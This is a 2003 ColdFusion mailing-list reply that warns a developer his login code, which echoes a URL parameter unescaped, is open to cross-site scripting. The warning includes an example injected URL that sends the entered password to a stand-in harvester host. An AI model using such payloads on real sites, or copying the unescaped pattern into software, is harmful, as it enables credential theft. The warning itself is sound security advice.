Beware of scripting vulnerabilities with the code you are currently writing.
An example URL to extract a user's password, all they have to do would be to click on this link (or a short link of it), enter their details on the web site (innocently), and bang! you have stolen their password by collecting it on a remote web site. http://www.example.com/loggedin/password.cfm?page_id="%20onclick="window.nav igate('http://myhome.example.com/pwd_harvester.cfm?pwd='+document.all.entere d_password) Sorry it's not an answer to your question though. - Peter -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: 23 October 2003 15:43 To: [EMAIL PROTECTED] Subject: Re: [ cf-dev ] passsing stuff around This really is mindblowing..... Check user logged in <cfif not isdefined("session.loggedin")> <cflocation url="loggedin/password.cfm?page_id=individ.cfm"> </cfif> if theyre not send them off to password.cfm and append the page you came from to the URL Once at password set a variable to the pased page details <cfset page=#url.page_id#> <cfoutput> #page# </cfoutput> Use that wicked no multiple click thingy from earlier ... <script language="JavaScript"> <!-- function submitForm() { document.form_name.clickme.value = "Please Wait..."; document.form_name.clickme.disabled = "disabled"; return true; } //--> </script> The form sends the login to login_action with the page details appended to the URL (I DONT THINK THIS BIT WORKS) <form name="form_name" action="login_action.cfm?page_id=#page#" method ="post" onsubmit="submitForm();"> <input type="Password" name="entered_user_name"> <input type="Password" name="entered_password"> <input name="clickme" type=submit value="Click Me"> </form> <cfif isdefined("session.nologin")> <cfoutput> <font color=red>Incorrect login details. Please try again</font> </cfoutput> </cfif> Once sent accross check the login details and do the following at login action I know have this <cfset Page=#url.page_id#> <cfoutput> #page# </cfoutput> <cfabort> Theres nothing in #page # and the URL parameters shows Page_Id as empty ..... :( So whats going on. Can I not pass URL values like this in a form???? Regards - Paul **************************************************************************** ********************* The information contained within this e-mail (and any attachment) sent by Birmingham City Council is confidential and may be legally privileged. It is intended only for the named recipient or entity to whom it is addressed. If you are not the intended recipient please accept our apologies and notify the sender immediately, or telephone +(44) 121 303 6666. Unauthorised access, use, disclosure, storage or copying is not permitted and may be unlawful. Any e-mail including its content may be monitored and used by Birmingham City Council for reasons of security and for monitoring internal compliance with the office policy on staff use. E-mail blocking software may also be used. Any views or opinions presented are solely those of the originator and do not necessarily represent those of Birmingham City Council. We cannot guarantee that this message or any attachment is virus free or has not been intercepted and amended. **************************************************************************** ********************* -- ** Archive: http://www.mail-archive.com/dev%40lists.cfdeveloper.co.uk/ To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] For human help, e-mail: [EMAIL PROTECTED] -- ** Archive: http://www.mail-archive.com/dev%40lists.cfdeveloper.co.uk/ To unsubscribe, e-mail: [EMAIL PROTECTED] For additional commands, e-mail: [EMAIL PROTECTED] For human help, e-mail: [EMAIL PROTECTED]
